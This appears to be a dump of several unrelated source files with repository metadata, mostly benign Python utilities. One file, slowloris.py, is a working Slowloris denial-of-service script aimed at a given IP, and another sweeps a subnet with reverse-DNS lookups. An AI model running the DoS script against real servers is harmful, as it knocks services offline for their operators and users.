45e1e2fa3701f2bf89181cfdbefd64dc0d1f878a | 4,347 | py | Python | neuralogic/core/constructs/atom.py | LukasZahradnik/PyNeurologic | 99025a92e86f772b139369acf75d08a3b506994d | [
"MIT"
] | null | null | null | neuralogic/core/constructs/atom.py | LukasZahradnik/PyNeurologic | 99025a92e86f772b139369acf75d08a3b506994d | [
"MIT"
] | null | null | null | neuralogic/core/constructs/atom.py | LukasZahradnik/PyNeurologic | 99025a92e86f772b139369acf75d08a3b506994d | [
"MIT"
] | null | null | null | from typing import Iterable, Union
from neuralogic.core.constructs.predicate import Predicate
from neuralogic.core.constructs import rule, factories
AtomType = Union["BaseAtom", "WeightedAtom"]
BodyAtomType = Union["BaseAtom", "WeightedAtom"]
Head = AtomType
Body = Union[Iterable[BodyAtomType], BodyAtomType]
| 31.273381 | 100 | 0.6294 | from typing import Iterable, Union
from neuralogic.core.constructs.predicate import Predicate
from neuralogic.core.constructs import rule, factories
AtomType = Union["BaseAtom", "WeightedAtom"]
BodyAtomType = Union["BaseAtom", "WeightedAtom"]
Head = AtomType
Body = Union[Iterable[BodyAtomType], BodyAtomType]
class BaseAtom:
def __init__(self, predicate: Predicate, terms=None, negated=False):
self.predicate = predicate
self.negated = negated
self.terms = terms
if self.terms is None:
self.terms = []
elif not isinstance(self.terms, Iterable):
self.terms = [self.terms]
def __neg__(self) -> "BaseAtom":
return self.__invert__()
def __invert__(self) -> "BaseAtom":
return BaseAtom(self.predicate, self.terms, not self.negated)
def __truediv__(self, other):
if not isinstance(other, int) or self.predicate.arity != 0 or other < 0:
raise NotImplementedError
name, private, special = self.predicate.name, self.predicate.private, self.predicate.special
return factories.AtomFactory.Predicate.get_predicate(name, other, private, special)
def __call__(self, *args) -> "BaseAtom":
if self.terms:
raise Exception
terms = list(args)
arity = len(terms)
name, private, special = self.predicate.name, self.predicate.private, self.predicate.special
predicate = factories.AtomFactory.Predicate.get_predicate(name, arity, private, special)
return BaseAtom(predicate, terms, self.negated)
def __getitem__(self, item) -> "WeightedAtom":
return WeightedAtom(self, item)
def __le__(self, other: Body) -> rule.Rule:
return rule.Rule(self, other)
def to_str(self, end=False) -> str:
negation = "~" if self.negated else ""
end = "." if end else ""
if self.terms:
terms = ", ".join(str(term) for term in self.terms)
return f"{negation}{self.predicate.to_str()}({terms}){end}"
return f"{negation}{self.predicate.to_str()}{end}"
def __str__(self) -> str:
return self.to_str(True)
def __copy__(self):
atom = BaseAtom.__new__(BaseAtom)
atom.negated = self.negated
atom.terms = self.terms
atom.predicate = self.predicate
class WeightedAtom: # todo gusta: mozna dedeni namisto kompozice?
def __init__(self, atom: BaseAtom, weight, fixed=False):
self.atom = atom
self.weight = weight
self.weight_name = None
self.is_fixed = fixed
if isinstance(weight, slice):
self.weight_name = str(weight.start)
self.weight = weight.stop
elif isinstance(weight, tuple) and isinstance(weight[0], slice):
self.weight_name = str(weight[0].start)
self.weight = (weight[0].stop, *weight[1:])
if isinstance(weight, Iterable) and not isinstance(weight, tuple):
self.weight = list(weight)
def fixed(self) -> "WeightedAtom":
if self.is_fixed:
raise Exception
# set_field(get_field(self.java_object, "weight"), "isFixed", True)
return WeightedAtom(self.atom, self.weight, True)
@property
def negated(self):
return self.atom.negated
@property
def predicate(self):
return self.atom.predicate
@property
def terms(self): # todo gusta: ...tim bys usetril toto volani atp.
return self.atom.terms
def __invert__(self) -> "WeightedAtom":
return WeightedAtom(~self.atom, self.weight, self.is_fixed)
def __neg__(self) -> "WeightedAtom":
return self.__invert__()
def __le__(self, other: Body) -> rule.Rule:
return rule.Rule(self, other)
def to_str(self, end=False):
if isinstance(self.weight, tuple):
weight = f"{{{', '.join(str(w) for w in self.weight)}}}"
else:
weight = str(self.weight)
if self.is_fixed:
return f"<{weight}> {self.atom.to_str(end)}"
return f"{weight} {self.atom.to_str(end)}"
def __str__(self):
return self.to_str(True)
def __copy__(self):
atom = WeightedAtom.__new__(WeightedAtom)
atom.atom = self.atom
atom.weight = self.weight
atom.is_fixed = self.is_fixed
| 3,339 | 377 | 315 |
49582d1081d0a7a36fa4b6ef69c3cd116e5a9b96 | 351 | py | Python | docs/_exts/setup.py | mihaimitrut/Sylius | 94f16e3adee4183f649ecc9d69faa1b6eb22116e | [
"MIT"
] | 86 | 2018-04-02T13:43:35.000Z | 2021-11-15T12:27:41.000Z | docs/_exts/setup.py | mihaimitrut/Sylius | 94f16e3adee4183f649ecc9d69faa1b6eb22116e | [
"MIT"
] | 82 | 2020-03-08T14:28:59.000Z | 2022-02-26T23:19:18.000Z | docs/_exts/setup.py | mihaimitrut/Sylius | 94f16e3adee4183f649ecc9d69faa1b6eb22116e | [
"MIT"
] | 29 | 2015-01-10T17:55:36.000Z | 2021-05-06T12:45:10.000Z | # -*- coding: utf-8 -*-
from setuptools import setup, find_packages
setup(
name = 'sphinx-php',
version = '1.0',
author = 'Fabien Potencier',
author_email = 'fabien@symfony.com',
description = 'Sphinx Extensions for PHP and Symfony',
license = 'MIT',
packages = find_packages(),
install_requires = ['Sphinx>=0.6'],
)
| 23.4 | 58 | 0.632479 | # -*- coding: utf-8 -*-
from setuptools import setup, find_packages
setup(
name = 'sphinx-php',
version = '1.0',
author = 'Fabien Potencier',
author_email = 'fabien@symfony.com',
description = 'Sphinx Extensions for PHP and Symfony',
license = 'MIT',
packages = find_packages(),
install_requires = ['Sphinx>=0.6'],
)
| 0 | 0 | 0 |
b49c63fd876909dbb64700ce718b1e23cbeb9695 | 2,587 | py | Python | SlowLoris DDos/slowloris.py | Marzooq13579/Hack-Gadgets | 4b9351c4465f3e01fb0390b1e86dfe7c26237a19 | [
"MIT"
] | 8 | 2019-02-17T20:11:46.000Z | 2019-10-18T06:27:16.000Z | SlowLoris DDos/slowloris.py | Marzooq13579/Hack-Gadgets | 4b9351c4465f3e01fb0390b1e86dfe7c26237a19 | [
"MIT"
] | null | null | null | SlowLoris DDos/slowloris.py | Marzooq13579/Hack-Gadgets | 4b9351c4465f3e01fb0390b1e86dfe7c26237a19 | [
"MIT"
] | 4 | 2019-02-17T23:00:18.000Z | 2019-10-18T06:27:14.000Z | import argparse
import logging
import random
import socket
import ssl
import sys
import time
lista_de_sockets = []
configuracao_agente = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
]
if __name__ == "__main__":
if len(sys.argv)> 1:
slowloris()
else:
print "Insira pelo menos 1 argumento no formato python slowlorys.py ipAddress numberOfSockets"
| 35.930556 | 127 | 0.625048 | import argparse
import logging
import random
import socket
import ssl
import sys
import time
lista_de_sockets = []
configuracao_agente = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
]
def iniciando_socket(ip,porta):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(4)
sock.connect((ip,porta))
sock.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8")) #envia requisicao http GET
sock.send("User-Agent: {}\r\n".format(configuracao_agente[0]).encode("utf-8")) #Informacao cabecalho tipo de navegador
sock.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8")) #fim do dado sem carriage return
return sock
def slowloris():
ip = sys.argv[1]
porta = 80
if len(sys.argv) == 3:
numero_de_sockets = int(sys.argv[2])
else:
numero_de_sockets = 33
print("Atacando " + ip+" com "+ str(numero_de_sockets) + " sockets.")
print("Criando os sockets...")
#cria conexao de cada socket
for i in range(numero_de_sockets):
try:
print("Criando socket de numero " + str(i))
sock = iniciando_socket(ip,porta)
except socket.error:
break
lista_de_sockets.append(sock)
#mantendo conexoes
while True:
print("Enviando dado em todos os sockets para manter a conexao aberta...")
print("Numero de sockets ativos: " + str(len(lista_de_sockets)))
#para cada socket da lista envia um novo dado
for sock in list(lista_de_sockets):
try:
#envia dado para conexao aberta
sock.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
except socket.error:
#retira sockets com conexao fechada
lista_de_sockets.remove(sock)
#verifica se algum socket foi retirado da lista de ativos
for i in range(numero_de_sockets - len(lista_de_sockets)):
print("Recriando socket de conexao perdida...")
try:
#cria um novo socket para substituir o socket cancelado
sock = iniciando_socket(ip,porta)
if sock:
lista_de_sockets.append(sock)
except socket.error:
break
time.sleep(15)
if __name__ == "__main__":
if len(sys.argv)> 1:
slowloris()
else:
print "Insira pelo menos 1 argumento no formato python slowlorys.py ipAddress numberOfSockets"
| 2,085 | 0 | 46 |
c3e165f84d82479663c332427c256f869f66e35c | 2,276 | py | Python | fileserver/membership/models.py | zsmith3/Photo-Manager-Server | 2b531159deadd1291d4a8e029a3cf375fb77156f | [
"MIT"
] | null | null | null | fileserver/membership/models.py | zsmith3/Photo-Manager-Server | 2b531159deadd1291d4a8e029a3cf375fb77156f | [
"MIT"
] | 10 | 2019-01-18T17:36:30.000Z | 2022-03-11T23:39:04.000Z | fileserver/membership/models.py | zsmith3/Photo-Manager-Server | 2b531159deadd1291d4a8e029a3cf375fb77156f | [
"MIT"
] | null | null | null | import secrets
from django.db import models
from django.contrib.auth.models import User, Group
# Authentication user group
models.signals.post_save.connect(create_auth_group, sender=Group)
# User configuration settings
models.signals.post_save.connect(create_user_config, sender=User)
| 31.178082 | 151 | 0.647627 | import secrets
from django.db import models
from django.contrib.auth.models import User, Group
# Authentication user group
class AuthGroup(models.Model):
group = models.OneToOneField(Group, related_name="auth", on_delete=models.CASCADE)
token = models.TextField(max_length=64, default=secrets.token_hex)
def __str__(self):
return str(self.group.name)
@staticmethod
def user_is_auth(user):
if AuthGroup.user_is_admin(user):
return True
auth = AuthGroup.objects.filter(id=1).first()
return auth.group in user.groups.all()
@staticmethod
def user_is_admin(user):
admin = AuthGroup.objects.filter(id=2).first()
return admin.group in user.groups.all()
def create_auth_group(sender, instance, created, **kwargs):
if created:
AuthGroup.objects.create(group=instance)
models.signals.post_save.connect(create_auth_group, sender=Group)
# User configuration settings
class UserConfig(models.Model):
user = models.OneToOneField(User, related_name="config", on_delete=models.CASCADE)
SETTINGS = {
"thumb_scale": {
"min": 0,
"max": 1,
"default": {
"desktop": 0.4,
"mobile": 0.2
}
},
"page_size": {
"options": [(x, str(x)) for x in [10, 25, 50, 100, 200, 500, 1000]],
"default": {
"desktop": "100",
"mobile": "25"
}
}
}
desktop_thumb_scale = models.FloatField(default=SETTINGS["thumb_scale"]["default"]["desktop"])
mobile_thumb_scale = models.FloatField(default=SETTINGS["thumb_scale"]["default"]["mobile"])
desktop_page_size = models.PositiveSmallIntegerField(choices=SETTINGS["page_size"]["options"], default=SETTINGS["page_size"]["default"]["desktop"])
mobile_page_size = models.PositiveSmallIntegerField(choices=SETTINGS["page_size"]["options"], default=SETTINGS["page_size"]["default"]["mobile"])
def __str__(self):
return "Config for %s" % str(self.user)
def create_user_config(sender, instance, created, **kwargs):
if created:
UserConfig.objects.create(user=instance)
models.signals.post_save.connect(create_user_config, sender=User)
| 561 | 1,330 | 90 |
7d72b0f383f1e25fcaa936c3a2b83568c37e53fe | 261 | py | Python | src/DNAAnimProp.py | Toonerz/libdna | 9729a4cee7a43f869353b6ecc84ec02f071a6f30 | [
"MIT"
] | 1 | 2021-02-23T12:05:39.000Z | 2021-02-23T12:05:39.000Z | src/DNAAnimProp.py | Toonerz/libdna | 9729a4cee7a43f869353b6ecc84ec02f071a6f30 | [
"MIT"
] | null | null | null | src/DNAAnimProp.py | Toonerz/libdna | 9729a4cee7a43f869353b6ecc84ec02f071a6f30 | [
"MIT"
] | null | null | null | from pandac.PandaModules import *
from panda3d.core import *
from DNAProp import DNAProp | 18.642857 | 33 | 0.735632 | from pandac.PandaModules import *
from panda3d.core import *
from DNAProp import DNAProp
class DNAAnimProp(DNAProp):
    """A DNAProp that additionally carries the name of an animation to play."""

    def __init__(self):
        DNAProp.__init__(self)
        # Bug fix: the original assigned a *local* variable ``anim`` here, so
        # getAnim() raised AttributeError until setAnim() was called.
        self.anim = ''

    def setAnim(self, anim):
        """Store the animation name for this prop."""
        self.anim = anim

    def getAnim(self):
        """Return the stored animation name ('' until one is set)."""
        return self.anim
2428b80a981e2bd8c1b6521bbf88ed16a990c957 | 2,828 | py | Python | problem_2/problem_2.py | informramiz/problems-vs-algorithms | efa853e7d1c87a6f566faa19e7a46d5ba170b98a | [
"MIT"
] | null | null | null | problem_2/problem_2.py | informramiz/problems-vs-algorithms | efa853e7d1c87a6f566faa19e7a46d5ba170b98a | [
"MIT"
] | null | null | null | problem_2/problem_2.py | informramiz/problems-vs-algorithms | efa853e7d1c87a6f566faa19e7a46d5ba170b98a | [
"MIT"
] | null | null | null | """
Author: Ramiz Raja
Created on: 11/01/2020
Problem: Search in a Rotated Sorted Array
You are given a sorted array which is rotated at some random pivot point.
Example: [0,1,2,4,5,6,7] might become [4,5,6,7,0,1,2]
You are given a target value to search. If found in the array return its index, otherwise return -1.
You can assume there are no duplicates in the array and your algorithm's runtime complexity must be in the order of O(log n).
Example:
Input: nums = [4,5,6,7,0,1,2], target = 0, Output: 4
"""
def rotated_array_search(input_list, number):
    """
    Find the index by searching in a rotated sorted array
    Args:
        input_list(array), number(int): Input array to search and the target
    Returns:
        int: Index or -1
    """
    # Binary search adapted to a rotated sorted array: at every step at least
    # one half of [start, end] is sorted, so decide which half can contain
    # ``number`` by inspecting the sorted half's endpoints.
    #
    # Bug fix: the original compared ``number`` only against
    # ``input_list[end]`` whenever the range was rotated, which discarded the
    # correct half when the pivot sat left of the midpoint — e.g. it returned
    # -1 for rotated_array_search([6, 7, 1, 2, 3, 4, 5], 1).
    start = 0
    end = len(input_list) - 1
    while start <= end:
        mid = (start + end) // 2
        if input_list[mid] == number:
            return mid
        if input_list[start] <= input_list[mid]:
            # Left half [start, mid] is sorted.
            if input_list[start] <= number < input_list[mid]:
                end = mid - 1
            else:
                start = mid + 1
        else:
            # Right half [mid, end] is sorted.
            if input_list[mid] < number <= input_list[end]:
                start = mid + 1
            else:
                end = mid - 1
    return -1
# NOTE(review): ``tests`` is not defined anywhere in this file as shown —
# presumably the helper definitions were stripped; confirm before running.
tests()
| 31.076923 | 125 | 0.608204 | """
Author: Ramiz Raja
Created on: 11/01/2020
Problem: Search in a Rotated Sorted Array
You are given a sorted array which is rotated at some random pivot point.
Example: [0,1,2,4,5,6,7] might become [4,5,6,7,0,1,2]
You are given a target value to search. If found in the array return its index, otherwise return -1.
You can assume there are no duplicates in the array and your algorithm's runtime complexity must be in the order of O(log n).
Example:
Input: nums = [4,5,6,7,0,1,2], target = 0, Output: 4
"""
def rotated_array_search(input_list, number):
    """
    Find the index by searching in a rotated sorted array
    Args:
        input_list(array), number(int): Input array to search and the target
    Returns:
        int: Index or -1
    """
    # Binary search adapted to a rotated sorted array: at every step at least
    # one half of [start, end] is sorted, so decide which half can contain
    # ``number`` by inspecting the sorted half's endpoints.
    #
    # Bug fix: the original compared ``number`` only against
    # ``input_list[end]`` whenever the range was rotated, which discarded the
    # correct half when the pivot sat left of the midpoint — e.g. it returned
    # -1 for rotated_array_search([6, 7, 1, 2, 3, 4, 5], 1).
    start = 0
    end = len(input_list) - 1
    while start <= end:
        mid = (start + end) // 2
        if input_list[mid] == number:
            return mid
        if input_list[start] <= input_list[mid]:
            # Left half [start, mid] is sorted.
            if input_list[start] <= number < input_list[mid]:
                end = mid - 1
            else:
                start = mid + 1
        else:
            # Right half [mid, end] is sorted.
            if input_list[mid] < number <= input_list[end]:
                start = mid + 1
            else:
                end = mid - 1
    return -1
def linear_search(input_list, number):
    """Return the first index of *number* in *input_list*, or -1 if absent."""
    for position, value in enumerate(input_list):
        if value == number:
            return position
    return -1
def assert_(expected, actual):
    """Raise AssertionError when *actual* differs from *expected*; print 'Pass' otherwise."""
    message = f"expected={expected}, actual={actual}"
    assert expected == actual, message
    print("Pass")
def test_function(test_case):
    """Check the binary search against the linear-search oracle for one case."""
    values, target = test_case[0], test_case[1]
    assert_(expected=linear_search(values, target),
            actual=rotated_array_search(values, target))
def tests():
    """Run all fixture cases through the linear-vs-binary comparison."""
    test_function(([6, 7, 8, 9, 10, 1, 2, 3, 4], 6))
    test_function(([6, 7, 8, 9, 10, 1, 2, 3, 4], 1))
    test_function(([6, 7, 8, 1, 2, 3, 4], 8))
    test_function(([6, 7, 8, 1, 2, 3, 4], 1))
    test_function(([6, 7, 8, 1, 2, 3, 4], 10))
    # edge cases
    # NOTE(review): the next case passes a *list* as the target; both searches
    # return -1 for it so the check still passes — confirm it is intended.
    test_function(([], [1]))
    test_function(([1], 1))
    test_function(([2, 1], 2))
tests()
| 744 | 0 | 92 |
965488f514c2ae38817ebced1bc0719fbe793eaa | 1,518 | py | Python | naucse/freezer.py | torsava/naucse.python.cz | 7770a151f81860f422121135a75768dbfbf51a23 | [
"MIT"
] | null | null | null | naucse/freezer.py | torsava/naucse.python.cz | 7770a151f81860f422121135a75768dbfbf51a23 | [
"MIT"
] | null | null | null | naucse/freezer.py | torsava/naucse.python.cz | 7770a151f81860f422121135a75768dbfbf51a23 | [
"MIT"
] | null | null | null | import contextlib
from flask_frozen import UrlForLogger, Freezer
from naucse.utils.routes import absolute_urls_to_freeze
class AllLinksLogger(UrlForLogger):
    """ AllLinksLogger primarily logs ``url_for`` calls, but yields urls from ``absolute_urls_to_freeze`` as well.
    """
    def iter_calls(self):
        """ Yields all logged urls and links parsed from content.
        Unfortunately, ``yield from`` cannot be used as the queues are modified on the go.
        """
        # Both deques may grow while iteration is in progress, so re-check
        # them on every pass instead of snapshotting.
        while self.logged_calls or absolute_urls_to_freeze:
            if self.logged_calls:
                yield self.logged_calls.popleft()
                # prefer urls from :attr:`logged_calls` - so, ideally, cache is populated from the base repository
                continue
            if absolute_urls_to_freeze:
                yield absolute_urls_to_freeze.popleft()
@contextlib.contextmanager
def temporary_url_for_logger(app):
    """ A context manager which temporary adds a new UrlForLogger to the app and yields it, so it can be used
    to get logged calls.
    """
    logger = UrlForLogger(app)
    yield logger
    # reverses the following operation from :class:`UrlForLogger`
    # self.app.url_default_functions.setdefault(None, []).insert(0, logger)
    # NOTE(review): this cleanup is skipped if the body raises; consider
    # try/finally if that matters.
    app.url_default_functions[None].pop(0)
| 34.5 | 115 | 0.692358 | import contextlib
from flask_frozen import UrlForLogger, Freezer
from naucse.utils.routes import absolute_urls_to_freeze
class AllLinksLogger(UrlForLogger):
    """Logger that yields both recorded ``url_for`` calls and the absolute
    URLs queued in ``absolute_urls_to_freeze``.
    """
    def iter_calls(self):
        """Drain both queues lazily, preferring logged ``url_for`` calls.

        ``yield from`` is not an option here because both queues keep being
        appended to while iteration is in progress.
        """
        while self.logged_calls or absolute_urls_to_freeze:
            if self.logged_calls:
                # Logged calls first — ideally the cache gets populated from
                # the base repository.
                yield self.logged_calls.popleft()
            elif absolute_urls_to_freeze:
                yield absolute_urls_to_freeze.popleft()
@contextlib.contextmanager
def temporary_url_for_logger(app):
    """ A context manager which temporary adds a new UrlForLogger to the app and yields it, so it can be used
    to get logged calls.
    """
    logger = UrlForLogger(app)
    yield logger
    # reverses the following operation from :class:`UrlForLogger`
    # self.app.url_default_functions.setdefault(None, []).insert(0, logger)
    # NOTE(review): this cleanup is skipped if the body raises; consider
    # try/finally if that matters.
    app.url_default_functions[None].pop(0)
class NaucseFreezer(Freezer):
    """Frozen-Flask freezer whose url_for logger also yields queued absolute URLs."""
    def __init__(self, app):
        super().__init__(app)
        self.url_for_logger = AllLinksLogger(app)  # override the default url_for_logger with our modified version
| 148 | 8 | 50 |
4df80a732327deba391ee66fbd56177b587b60c7 | 188 | py | Python | consulting_reverse/ping_get_reverse.py | andradjp/tools | 4cb2123563518f8a029fa9d67e9e6eabd18aa863 | [
"MIT"
] | null | null | null | consulting_reverse/ping_get_reverse.py | andradjp/tools | 4cb2123563518f8a029fa9d67e9e6eabd18aa863 | [
"MIT"
] | null | null | null | consulting_reverse/ping_get_reverse.py | andradjp/tools | 4cb2123563518f8a029fa9d67e9e6eabd18aa863 | [
"MIT"
] | null | null | null | import ipaddress
import socket
# Reverse-resolve every address in the subnet and print its PTR hostname.
# ``network`` replaces the original variable name ``range``, which shadowed
# the builtin of the same name.
network = ipaddress.IPv4Network('10.7.0.0/22')
for address in network:
    try:
        print(socket.gethostbyaddr(str(address))[0])
    except socket.herror:
        # Host has no reverse DNS record; skip it.
        pass
| 18.8 | 46 | 0.659574 | import ipaddress
import socket
# Reverse-resolve every address in the subnet and print its PTR hostname.
# ``network`` replaces the original variable name ``range``, which shadowed
# the builtin of the same name.
network = ipaddress.IPv4Network('10.7.0.0/22')
for address in network:
    try:
        print(socket.gethostbyaddr(str(address))[0])
    except socket.herror:
        # Host has no reverse DNS record; skip it.
        pass
| 0 | 0 | 0 |
d0e75528430acec4c392c38b5859feb156cb5d4b | 325 | py | Python | docs/source/notebooks/01.py | JulianKarlBauer/orientation_averaging_mean_field | 75acb5ed58aa6a69cec7508d3d45865bbab3ed3c | [
"MIT"
] | null | null | null | docs/source/notebooks/01.py | JulianKarlBauer/orientation_averaging_mean_field | 75acb5ed58aa6a69cec7508d3d45865bbab3ed3c | [
"MIT"
] | null | null | null | docs/source/notebooks/01.py | JulianKarlBauer/orientation_averaging_mean_field | 75acb5ed58aa6a69cec7508d3d45865bbab3ed3c | [
"MIT"
] | null | null | null | # # Get points witin admissible parameter space
import planarfibers
import pandas as pd
# Widen pandas' console output so the full table prints without truncation.
pd.set_option('display.max_columns', 100)
pd.set_option('display.width', 1000)
# Sample points within the admissible parameter space on three radial slices;
# numeric=False keeps the values as the exact fraction strings given.
df = planarfibers.discretization.get_points_on_slices(
    radii=["0", "1/2", "9/10"],
    la1s=["1/2", "4/6", "5/6", "1"],
    numeric=False,
)
print(df)
| 21.666667 | 54 | 0.683077 | # # Get points witin admissible parameter space
import planarfibers
import pandas as pd
# Widen pandas' console output so the full table prints without truncation.
pd.set_option('display.max_columns', 100)
pd.set_option('display.width', 1000)
# Sample points within the admissible parameter space on three radial slices;
# numeric=False keeps the values as the exact fraction strings given.
df = planarfibers.discretization.get_points_on_slices(
    radii=["0", "1/2", "9/10"],
    la1s=["1/2", "4/6", "5/6", "1"],
    numeric=False,
)
print(df)
| 0 | 0 | 0 |
06decb392e619bb9bfe10a2d0ce6c1804c2c06e6 | 1,077 | py | Python | virtman/virtman/cmd/virtman.py | vmthunder/packages | e530e243007a0f403cad1b67a490ffb9687969c3 | [
"Apache-2.0"
] | 2 | 2015-03-15T11:12:53.000Z | 2018-10-12T03:05:52.000Z | virtman/virtman/cmd/virtman.py | vmthunder/packages | e530e243007a0f403cad1b67a490ffb9687969c3 | [
"Apache-2.0"
] | null | null | null | virtman/virtman/cmd/virtman.py | vmthunder/packages | e530e243007a0f403cad1b67a490ffb9687969c3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import sys
import threading
import time
from oslo.config import cfg
from virtman import compute
from virtman.openstack.common import log as logging
#TODO: Auto determine host ip if not filled in conf file
CONF = cfg.CONF
if __name__ == '__main__':
    # Parse CLI args / config file, set up logging, then run the service.
    # NOTE(review): ``start`` is not defined anywhere in this file as shown;
    # confirm its definition was not lost.
    CONF(sys.argv[1:], project='virtman',
         default_config_files = ['/root/packages/virtman/etc/virtman/virtman.conf'])
    logging.setup('virtman')
    start()
| 26.925 | 85 | 0.601671 | #!/usr/bin/env python
import sys
import threading
import time
from oslo.config import cfg
from virtman import compute
from virtman.openstack.common import log as logging
#TODO: Auto determine host ip if not filled in conf file
CONF = cfg.CONF
def start():
    """Create the compute node and launch the background heartbeat thread."""
    cn = compute.Compute()

    class HeartBeater(threading.Thread):
        """Worker thread that reports liveness at a fixed interval."""

        def __init__(self, thread_name):
            super(HeartBeater, self).__init__(name=thread_name)

        def run(self):
            LOG = logging.getLogger(__name__)
            # Bug fix: the original used a recursive clock() helper, growing
            # the call stack by one frame per heartbeat until it hit the
            # interpreter recursion limit (its own TODO admitted this).
            # A plain loop has the same observable behavior without the leak.
            while True:
                LOG.debug("At %s heartbeat once" % time.asctime())
                cn.heartbeat()
                time.sleep(CONF.heartbeat_interval)

    heartbeat = HeartBeater('heartbeat')
    heartbeat.start()
if __name__ == '__main__':
    # Parse CLI args / config file, set up logging, then run the service.
    CONF(sys.argv[1:], project='virtman',
         default_config_files = ['/root/packages/virtman/etc/virtman/virtman.conf'])
    logging.setup('virtman')
    start()
| 588 | 0 | 25 |
1985c161fbb9d2809684a53e570e6a3feafe0a55 | 1,380 | py | Python | auger/utils/html.py | m-flak/auger | 5b58e549405bddcc6fc67867c0c151f415e01364 | [
"Apache-2.0"
] | 1 | 2021-05-22T07:47:58.000Z | 2021-05-22T07:47:58.000Z | auger/utils/html.py | m-flak/auger | 5b58e549405bddcc6fc67867c0c151f415e01364 | [
"Apache-2.0"
] | 1 | 2020-01-08T00:11:36.000Z | 2020-01-08T00:17:55.000Z | auger/utils/html.py | m-flak/auger | 5b58e549405bddcc6fc67867c0c151f415e01364 | [
"Apache-2.0"
] | null | null | null | import lxml.html
class QuickTag:
    """ Callable to quickly create lxml element and access it.
    """
    def __init__(self, content, tag):
        # Restored constructor: callers (``append_to_body``) build
        # ``QuickTag(content, tag)``, yet this class defined no __init__ and
        # never set the attributes read by __call__.
        self._tag = tag
        self._content = content
        self._element = lxml.html.Element(tag)
        self._element.text = content

    def __call__(self, as_element=True):
        """If `as_element` is `False`, return tuple of content, tag.
        Otherwise, lxml.html.Element class is returned.
        """
        if as_element:
            return self._element
        return self._content, self._tag
def clear_body_and_insert(html, insert_content, insert_tag):
    """Clears the body of an HTML string.
    Appends <insert_tag>insert_content</insert_tag> to the body.
    """
    document = lxml.html.fromstring(html)
    # Drop every existing child of <body> before inserting the new element.
    for kid in document.body.getchildren():
        document.body.remove(kid)
    return append_to_body(document, insert_content, insert_tag)
def append_to_body(html, append_content, append_tag):
    """Appends <append_tag>append_content</append_tag> to an HTML string or
    an lxml document.
    """
    # Accept either an already-parsed lxml document or a raw HTML string.
    if isinstance(html, lxml.html.HtmlElement):
        document = html
    else:
        document = lxml.html.fromstring(html)
    append_me = QuickTag(append_content, append_tag)
    document.body.append(append_me())
    return lxml.html.tostring(document, method='html', encoding='unicode')
| 30 | 75 | 0.673188 | import lxml.html
class QuickTag:
    """Callable helper that wraps a text payload in an lxml element."""

    def __init__(self, content, tag):
        self._content = content
        self._tag = tag
        element = lxml.html.Element(tag)
        element.text = content
        self._element = element

    def __call__(self, as_element=True):
        """Return the built element, or the ``(content, tag)`` pair when
        *as_element* is false."""
        if not as_element:
            return self._content, self._tag
        return self._element
def clear_body_and_insert(html, insert_content, insert_tag):
    """Clears the body of an HTML string.
    Appends <insert_tag>insert_content</insert_tag> to the body.
    """
    document = lxml.html.fromstring(html)
    # Drop every existing child of <body> before inserting the new element.
    for kid in document.body.getchildren():
        document.body.remove(kid)
    return append_to_body(document, insert_content, insert_tag)
def append_to_body(html, append_content, append_tag):
    """Appends <append_tag>append_content</append_tag> to an HTML string or
    an lxml document.
    """
    # Accept either an already-parsed lxml document or a raw HTML string.
    if isinstance(html, lxml.html.HtmlElement):
        document = html
    else:
        document = lxml.html.fromstring(html)
    append_me = QuickTag(append_content, append_tag)
    document.body.append(append_me())
    return lxml.html.tostring(document, method='html', encoding='unicode')
| 152 | 0 | 26 |
8a7f0387ee1e5a8d71ef14387eec554a34d31620 | 6,789 | py | Python | django_filters/utils.py | timothyjlaurent/django-filter | 06b1a6d65a2b6eccaac91b8ebf17154f9206c7fe | [
"BSD-3-Clause"
] | null | null | null | django_filters/utils.py | timothyjlaurent/django-filter | 06b1a6d65a2b6eccaac91b8ebf17154f9206c7fe | [
"BSD-3-Clause"
] | 1 | 2021-03-26T00:33:06.000Z | 2021-03-26T00:33:06.000Z | django_filters/utils.py | timothyjlaurent/django-filter | 06b1a6d65a2b6eccaac91b8ebf17154f9206c7fe | [
"BSD-3-Clause"
] | null | null | null | import warnings
from django.conf import settings
from django.core.exceptions import FieldError
from django.db import models
from django.db.models.constants import LOOKUP_SEP
from django.db.models.expressions import Expression
from django.db.models.fields import FieldDoesNotExist
from django.db.models.fields.related import RelatedField, ForeignObjectRel
from django.utils import six, timezone
from django.utils.encoding import force_text
from django.utils.translation import ugettext as _
try:
from django.forms.utils import pretty_name
except ImportError: # Django 1.8
from django.forms.forms import pretty_name
from .compat import remote_field, remote_model
from .exceptions import FieldLookupError
def try_dbfield(fn, field_class):
    """
    Try ``fn`` with the DB ``field_class`` by walking its
    MRO until a result is found.
    ex::
        _try_dbfield(field_dict.get, models.CharField)
    """
    for klass in field_class.mro():
        # ``models.Field`` itself never carries useful data; skip it but
        # keep walking the remainder of the MRO.
        if klass is models.Field:
            continue
        result = fn(klass)
        if result:
            return result
def get_model_field(model, field_name):
    """
    Get a ``model`` field, traversing relationships
    in the ``field_name``.
    ex::
        f = get_model_field(Book, 'author__first_name')
    """
    parts = get_field_parts(model, field_name)
    if not parts:
        return None
    return parts[-1]
def get_field_parts(model, field_name):
    """
    Get the field parts that represent the traversable relationships from the
    base ``model`` to the final field, described by ``field_name``.
    ex::
        >>> parts = get_field_parts(Book, 'author__first_name')
        >>> [p.verbose_name for p in parts]
        ['author', 'first name']
    """
    parts = field_name.split(LOOKUP_SEP)
    opts = model._meta
    fields = []
    # walk relationships
    for name in parts:
        try:
            field = opts.get_field(name)
        except FieldDoesNotExist:
            # Any unresolvable part invalidates the whole expression.
            return None
        fields.append(field)
        # Hop to the related model's meta: forward relations via the remote
        # model, reverse relations via ``related_model``.
        if isinstance(field, RelatedField):
            opts = remote_model(field)._meta
        elif isinstance(field, ForeignObjectRel):
            opts = field.related_model._meta
    return fields
def resolve_field(model_field, lookup_expr):
